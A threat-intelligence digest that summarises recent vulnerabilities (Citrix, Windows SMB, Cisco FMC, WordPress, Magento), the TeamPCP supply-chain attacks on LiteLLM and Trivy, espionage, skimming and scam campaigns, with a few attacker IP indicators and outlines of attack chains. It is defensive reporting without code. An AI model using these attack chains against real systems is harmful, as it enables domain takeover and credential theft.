Threat Landscape

WatchTowr Labs has published research on CVE-2026-3055, a critical memory overread vulnerability (CVSS4.0: 9.3) affecting Citrix NetScaler ADC and NetScaler Gateway. The flaw, rooted in insufficient input validation within the appliance's C-based XML/SAML parser, is exploitable only when the device is configured as a SAML Identity Provider. Successful exploitation can leak heap memory contents to unauthenticated attackers via the NSC_TASS response cookie. The vulnerability echoes prior CitrixBleed incidents and reinforces a troubling pattern of fragile memory management in NetScaler appliances. Citrix has released patched versions, and organizations are strongly urged to upgrade immediately. Researchers also discovered additional similar vulnerabilities, which have been privately disclosed to Citrix's PSIRT team.

CVE-2025-33073 is a critical Windows SMB client vulnerability that revives NTLM reflection attacks, enabling any authenticated domain user with network access to achieve SYSTEM-level remote code execution on unpatched, domain-joined machines without SMB signing. Unlike prior NTLM relay techniques, this vulnerability requires no administrative privileges as a prerequisite. When combined with unconstrained delegation — a legacy Kerberos configuration still prevalent in many enterprises — attackers can coerce a domain controller to authenticate to a compromised host, capture its Ticket Granting Ticket, and perform a DCSync to fully compromise the domain. Organizations that have hardened domain controllers but neglected the systems one hop away remain exposed. Immediate patching, enabling SMB signing on delegation hosts, and auditing unconstrained delegation configurations are the recommended priority actions.

The criminal group TeamPCP orchestrated a sophisticated multi-ecosystem supply chain campaign that compromised LiteLLM, a widely-used AI proxy package downloaded 3.4 million times daily. Two malicious PyPI versions (1.82.7 and 1.82.8) deployed a three-stage payload harvesting cloud credentials, SSH keys, Kubernetes secrets, and LLM API keys from over 50 secret categories. The attack originated from a compromised Trivy security scanner GitHub Action, cascading through npm, Docker Hub, Checkmarx KICS, and ultimately LiteLLM. The campaign exposed how AI proxy services that centralize API keys become high-value targets in supply chain attacks. PyPI quarantined both versions approximately three hours after community discovery, though confirmation of successful credential exploitation remains unverified publicly.

A critical authenticated privilege escalation vulnerability (CVE-2026-2931) has been identified in Amelia Booking Pro versions up to and including 9.1.2, a widely deployed WordPress appointment scheduling plugin with over 50,000 active installations. The flaw allows any authenticated Amelia customer to reset the password of arbitrary WordPress accounts, including site administrators, by manipulating an identity-linking field during a profile update request. Successful exploitation provides an attacker with full WordPress administrative access, enabling malicious plugin installation, backdoor deployment, visitor redirection, customer data exfiltration, and potentially Remote Code Execution on the underlying server. No vendor patch was available at the time of public disclosure.

VulnCheck's Initial Access Intelligence team has published a detailed exploit development analysis for CVE-2026-20079, a CVSS 10.0 unauthenticated remote code execution vulnerability in Cisco Secure Firewall Management Center (FMC). The vulnerability stems from an improper boot-time process that creates a persistent machine-user session with a static, predictable session ID ('csm_processes') in the authentication database. By chaining session fixation, hardcoded credential abuse, CSRF token extraction, arbitrary file write, and a license upgrade installer mechanism, an unauthenticated remote attacker can achieve root-level code execution. Approximately 300–700 FMC instances are estimated to be exposed on the public internet, making this a significant risk for organizations relying on Cisco FMC for network security management.

Organizations face escalating risk to their most critical systems — domain controllers, web servers, and identity infrastructure — which are targeted in over 78% of human-operated cyberattacks. Microsoft Defender, integrated with Microsoft Security Exposure Management, applies asset-aware, context-enriched protections that go beyond traditional behavioral detection. By classifying High-Value Assets (HVAs) and understanding their roles, Defender can elevate weak signals into high-confidence detections and preventions. Key recommendations include ensuring complete HVA classification coverage, prioritizing security posture improvements and alert response for HVAs, and triaging vulnerabilities based on asset criticality rather than severity score alone.

The TeamPCP threat actor group has compromised the official Telnyx Python SDK on PyPI, marking the latest escalation in a weeks-long supply chain attack campaign spanning multiple ecosystems. The campaign follows a consistent pattern: compromise a trusted security or developer tool, steal credentials from CI/CD pipelines, and use those credentials to push malicious package versions to downstream consumers. Prior targets include Aqua Security's Trivy scanner, 46+ npm packages via CanisterWorm, Checkmarx GitHub Actions and VSX extensions, and LiteLLM. Organizations using affected packages should immediately remove malicious versions, rotate all secrets accessible from impacted environments, and monitor for C2 communications to 83[.]142[.]209[.]203.

Criminal enterprises have rapidly adopted AI to scale fraud and automate money laundering, with AI-enabled scam activity increasing roughly 500% in 2025 and over USD 35 billion sent to fraud schemes. Current blockchain intelligence tools — while foundational — remain largely reactive. The next phase of defensive AI shifts emphasis upstream: predictive typology modeling, continuous multi-chain surveillance, and coordinated real-time intervention. Critically, responsible design — including explainability, privacy protections, and human oversight — is not optional but essential for legal defensibility and government deployment. The most effective enforcement model will be hybrid, combining machine-scale analysis with human judgment for high-stakes decisions.

Palo Alto Networks Unit 42 uncovered a persistent cyberespionage campaign targeting a Southeast Asian government organization, involving three distinct but potentially coordinated activity clusters. The first cluster is attributed with high confidence to Stately Taurus, deploying USB-propagated malware (USBFect/HIUPAN) and the PUBLOAD backdoor. The second cluster, CL-STA-1048, deployed a diverse espionage toolkit including EggStremeFuel, Masol RAT, EggStreme Loader with Gorem RAT, and a novel infostealer named TrackBak. The third cluster, CL-STA-1049, used a newly identified Hypnosis loader to deploy FluffyGh0st RAT, linked to Unfading Sea Haze. All three clusters exhibit strong links to China-aligned threat actors, suggesting a coordinated effort to achieve persistent access to sensitive government networks for long-term intelligence collection.

A malicious Chrome extension named 'ChatGPT Ad Blocker' was discovered on the Google Chrome Web Store, designed to steal users' ChatGPT conversation data under the guise of blocking ads. Linked to GitHub account 'krittinkalra' and associated services AI4ChatCo and Writecream, the extension exploits OpenAI's policy shift to serve advertisements on its free tier. Rather than blocking ads, the extension harvests full conversation content, user prompts, and page metadata, exfiltrating it to a private Discord channel via a hardcoded webhook. Users and organizations relying on ChatGPT should treat this extension and affiliated developer services with extreme caution, as the scope of data theft may extend beyond this single extension.

A new Metasploit Framework release introduces significant improvements to SMB NTLM relay functionality and adds three new exploit modules targeting critical vulnerabilities. The NTLM relay server now supports a broader range of clients, including Linux's smbclient, by altering its relaying strategy when a single target is specified. New modules cover an unauthenticated RCE in Eclipse Che machine-exec (CVE-2025-12548), a command injection vulnerability in Barracuda Email Security Gateway appliances (CVE-2023-2868), and an ESC/POS printer command injection flaw (CVE-2026-23767). Five bug fixes and one enhancement to environment variable handling in post modules are also included.

The PCP Team executed supply chain attacks against two widely-used development ecosystem components: AquaSecurity's trivy-action GitHub Action and the Python litellm package. GitGuardian's analysis identified 474 repositories that executed malicious trivy-action code during the compromise window, with high-profile organizations including Canonical, Microsoft, and NASA among potential victims. For litellm, 1,705 PyPI packages were configured to automatically pull compromised versions, including highly popular projects such as dspy (5M monthly downloads) and google-cloud-aiplatform (181M monthly downloads). These figures represent lower bounds, as private repositories and transitive dependencies extend the true scope beyond what publicly available data can reveal.

CVE-2020-8561 is an unpatchable Kubernetes vulnerability that enables Server-Side Request Forgery (SSRF) attacks against the Kubernetes API server. An attacker with elevated privileges, typically cluster-admin, can chain two capabilities: abusing validatingwebhookconfigurations objects to force the API server to make arbitrary network requests, and leveraging the default profiling endpoints to increase the API server's log verbosity to expose full responses. This is particularly dangerous in managed Kubernetes environments where the control plane resides in a privileged cloud provider network zone normally inaccessible to cluster operators. Mitigations include disabling the --profiling flag and enforcing network segmentation to limit SSRF utility.

This article, the first in a five-part series by NVISO, examines why conventional security testing methodologies are fundamentally misaligned with AI and LLM systems. The author argues that assumptions underpinning traditional testing — deterministic input-output mappings, explicit security boundaries, and exhaustive coverage — break down when applied to probabilistic, generative AI. Real-world evidence underscores the urgency: prompt injection reports grew 540% year-over-year in 2025, and 97% of organizations that experienced AI-related breaches lacked proper AI access controls. The article frames AI security testing as a shift from asserting exact values to validating behavioral bounds, and situates this within regulatory obligations such as the EU AI Act and voluntary frameworks like NIST AI RMF and MITRE ATLAS.

Cisco Talos' Vulnerability Discovery & Research team has disclosed a total of 30 vulnerabilities spanning three major vendors: HikVision, TP-Link, and Canva Affinity. All vulnerabilities have been patched by their respective vendors in accordance with Cisco's third-party vulnerability disclosure policy. The flaws range in severity and impact, with several enabling remote or arbitrary code execution, sensitive data disclosure, and credential leakage. Organizations using affected products — particularly TP-Link Archer AX53 routers, HikVision Ultra Face Recognition Terminals, and Canva Affinity design software — are strongly encouraged to apply available patches and leverage updated Snort rule sets for detection coverage.

The threat actor TeamPCP (aka DeadCatx3, PCPcat, ShellForce, CanisterWorm) successfully compromised Aqua Security's internal GitHub organization aquasec-com, defacing all 44 repositories in a scripted two-minute burst. Every repository was renamed with a 'tpcp-docs-' prefix and had its description changed to 'TeamPCP Owns Aqua Security.' Exposed repositories include internal source code for Tracee, Trivy forks, CI/CD pipelines, Kubernetes operators, and team knowledge bases. The attack vector is attributed with high confidence to a stolen PAT for the Argon-DevOps-Mgt service account, likely harvested during TeamPCP's prior Trivy GitHub Actions supply chain compromise. The incident represents a significant escalation in TeamPCP's ongoing campaign targeting the cloud-native security ecosystem.

PolyShell is a critical vulnerability affecting Magento Open Source 2 and Adobe Commerce platforms, targeting the REST API used for file uploads in custom product options. Successful exploitation can result in Remote Code Execution, Stored Cross-Site Scripting, account takeover, and deployment of payment card skimmers — posing severe risk to e-commerce organizations handling sensitive customer and payment data. The vulnerability is actively exploited in the wild. A fix is available only in the pre-release version 2.4.9-beta1, leaving most production deployments currently exposed. Organizations are urged to apply patches, restrict API exposure, enforce strict file validation, and implement enhanced monitoring and incident response measures immediately.

A sophisticated, long-running Magecart campaign has been identified targeting e-commerce websites globally, with operations sustained for over 24 months across more than 100 domains. Seventeen WooCommerce sites across at least 12 countries have been confirmed as victims, with notable concentration in Spain, France, and the United States. While merchants are the initial compromise targets, the primary financial and reputational impact falls on banks and payment processors through stolen card data. The campaign's durability stems from multi-stage payload delivery, dynamic infrastructure rotation, and high-fidelity mimicry of legitimate payment providers—most notably Spain's Redsys system—making fraudulent transactions appear credible to unsuspecting cardholders.

Infoblox Threat Intel and Confiant present the second installment of a four-month study on the abuse of Keitaro, a commercial advertising performance tracker exploited by a wide range of threat actors. Over 20% of threat actors tracked by Confiant during the study period leveraged Keitaro, with some campaigns generating tens of millions of impressions. Threat activity spans malware delivery, cryptocurrency wallet draining, phishing, investment scams, fake pharmaceuticals, online gambling, and domain hijacking. Approximately 96% of spam campaigns linking to Keitaro instances led to cryptocurrency wallet drainers. Named actors include TilapiaParabens, HircusPircus, AirportArrest, and TheNovosti, alongside numerous unattributed clusters. The majority of observed Keitaro instances are tied to Eastern European operators, frequently hosted on bulletproof infrastructure or fronted by Cloudflare.

A new criminal service called 'Leak Bazaar,' advertised on the Russian-speaking TierOne forum by a user known as Snow, represents a significant evolution in ransomware and extortion economics. Rather than simply hosting raw stolen data, Leak Bazaar positions itself as a managed post-exfiltration processing layer that filters, categorizes, and repackages corporate data into buyer-oriented segments such as financial reporting, M&A intelligence, R&D material, and personal data. The platform offers a 70/30 revenue split favoring data suppliers, supports both exclusive and multi-buyer sales models, and embeds itself into victim negotiation workflows. This model transforms failed ransom events into structured, recurring revenue streams, signaling a maturation of the criminal data marketplace.

Scammers are evolving beyond celebrity deepfakes toward industrialized 'avatar farms' that manufacture synthetic presenters to deliver fraudulent pitches at scale. Unlike celebrity impersonation, AI-generated avatars carry no real-world identity, making them harder to debunk and cheaper to reuse across topics and languages. Research reveals that the most prevalent 'presenters' in scam-labeled videos are not real people but AI-generated avatars sourced from services on freelance marketplaces. The true engine of these scams is the message — urgent scripts, false promises, and pressure tactics — not the face. Audio-first detection methods are proving more reliable than visual analysis alone, especially since some scams overlay fraudulent narration onto legitimate footage, bypassing face-based detection entirely.

Iranian-backed cyber operations have significantly escalated, driven by geopolitical conflict involving the US and Israel. A 700% spike in cyberattacks against Israel has been recorded, with pro-Iran groups conducting DDoS campaigns, destructive wiper deployments, hack-and-leak operations, and OT/ICS targeting across Gulf energy infrastructure, water systems, and defense sectors. Notable incidents include the Handala group's attack on medical technology firm Stryker and Cotton Sandstorm's reactivation after a year of silence. CISA has issued multiple Iran-specific advisories reflecting sustained intelligence community concern. Iranian actors have also expanded ransomware collaboration with criminal networks and are abusing cloud infrastructure for follow-on operations, representing a strategic shift toward hybrid criminal-state partnerships.

The Reservation Hijack Scam is a sophisticated fraud campaign targeting hotel guests by exploiting compromised hospitality management platforms and booking workflows. Unlike generic phishing, attackers first steal credentials from hotel staff to access real reservation data via platforms such as Cloudbeds and Booking.com partner accounts. Armed with genuine booking context, they contact travelers via WhatsApp, SMS, or email with highly personalized messages that mimic routine customer service. In the most dangerous variants, attackers operate directly through legitimate hotel communication channels, making fraud nearly indistinguishable from authentic hotel contact. The campaign is active across Western Europe, the US, Brazil, and Australia, and can result in payment card theft, financial fraud, and broader account compromise.

VulnCheck's Canary Intelligence team identified active Kinsing botnet exploitation across three CVEs — CVE-2023-46604 (Apache ActiveMQ), CVE-2023-38646 (Metabase), and the newly observed CVE-2025-55182 (React2Shell) — all converging on shared attacker infrastructure. The attacker node at 212.113.98.30 delivered payloads through a common staging host at 78.153.140.16. This clustering demonstrates Kinsing's continued relevance without requiring new binaries, instead leveraging additional CVEs to expand its attack surface. The campaign deploys a classic Kinsing toolkit: a Go-based cryptomining payload and a rootkit (libsystem.so) that hides malicious files and network activity within user-space processes.